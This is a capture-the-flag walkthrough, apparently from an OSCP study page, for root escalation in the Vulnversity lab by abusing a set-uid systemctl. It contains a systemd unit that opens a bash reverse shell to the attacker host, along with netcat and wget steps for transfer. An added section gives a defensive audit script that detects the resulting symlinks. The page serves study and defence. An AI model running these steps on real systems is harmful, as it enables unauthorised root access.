https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'
[Install]
WantedBy=multi-user.target
find / -maxdepth 2 -type f -writable
or
find / -maxdepth 2 -type d -writable
nc -vl 44444 > root.service
nc -n TargetIP 44444 < root.service
nc -lvnp 9999
/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root
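A defender-side counterpart to the steps above, added here and not part of the original writeup: a POSIX shell audit for the two things this escalation depends on and leaves behind. The first is a set-uid systemctl binary (the GTFOBins entry linked below). The second is the pair of symlinks that systemctl enable printed above, which point an enabled unit at a file outside the standard unit directories (/dev/shm in this case). The function names, default paths and allowed-prefix list are my assumptions; the functions take directories as arguments so they can be run against a staged tree as well as a live host. Masked units (symlinks to /dev/null) are legitimate and are skipped.

```shell
#!/bin/sh
# Added audit example (not from the original walkthrough). It checks for the two
# conditions the escalation above relies on and leaves behind:
#   1. a set-uid systemctl binary (the root cause);
#   2. an enabled unit whose symlink resolves to a file outside the standard unit
#      directories, or to a world-writable file (the artefact 'systemctl enable' printed).
# Function names, default paths and the allowed-prefix list are assumptions for this example.

# Print every argument that carries the set-uid bit.
find_suid_binaries() {
    for bin in "$@"; do
        if [ -u "$bin" ]; then
            printf '%s\n' "$bin"
        fi
    done
}

# Succeed when $1 lies under one of the directory prefixes given as the remaining arguments.
under_any_prefix() {
    path=$1
    shift
    for prefix in "$@"; do
        case "$path" in
            "$prefix"/*) return 0 ;;
        esac
    done
    return 1
}

# Walk the unit directory $1 (e.g. /etc/systemd/system, including its *.wants subdirs)
# and print 'SUSPICIOUS <link> -> <target>' for every *.service symlink whose target
# is outside the allowed prefixes (remaining arguments) or is world-writable.
audit_unit_links() {
    unit_dir=$1
    shift
    find "$unit_dir" -type l -name '*.service' 2>/dev/null | while IFS= read -r link; do
        target=$(readlink -f "$link")
        if [ "$target" = /dev/null ]; then
            continue   # 'systemctl mask' links units to /dev/null; that is legitimate
        fi
        if ! under_any_prefix "$target" "$@"; then
            printf 'SUSPICIOUS %s -> %s (outside unit directories)\n' "$link" "$target"
        elif [ -n "$(find "$target" -prune -perm -0002 2>/dev/null)" ]; then
            printf 'SUSPICIOUS %s -> %s (world-writable)\n' "$link" "$target"
        fi
    done
}

# Live run against the standard locations; both commands print nothing on a healthy host.
find_suid_binaries /bin/systemctl /usr/bin/systemctl
audit_unit_links /etc/systemd/system /etc/systemd /usr/lib/systemd /lib/systemd /run/systemd
```

The prefix check, rather than a file-permission check alone, is what catches the case on this page: /dev/shm/root.service need not be world-writable itself, it only has to live in a directory the low-privileged user could write to.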
Cheers
https://gtfobins.github.io/gtfobins/systemctl/#suid
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room): serve it from your attacker machine using python http.server, then wget it in the reverse shell you already have.

Find a writable directory on the compromised server by running:
find / -maxdepth 2 -type d -writable
cd into it.

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)

Voila!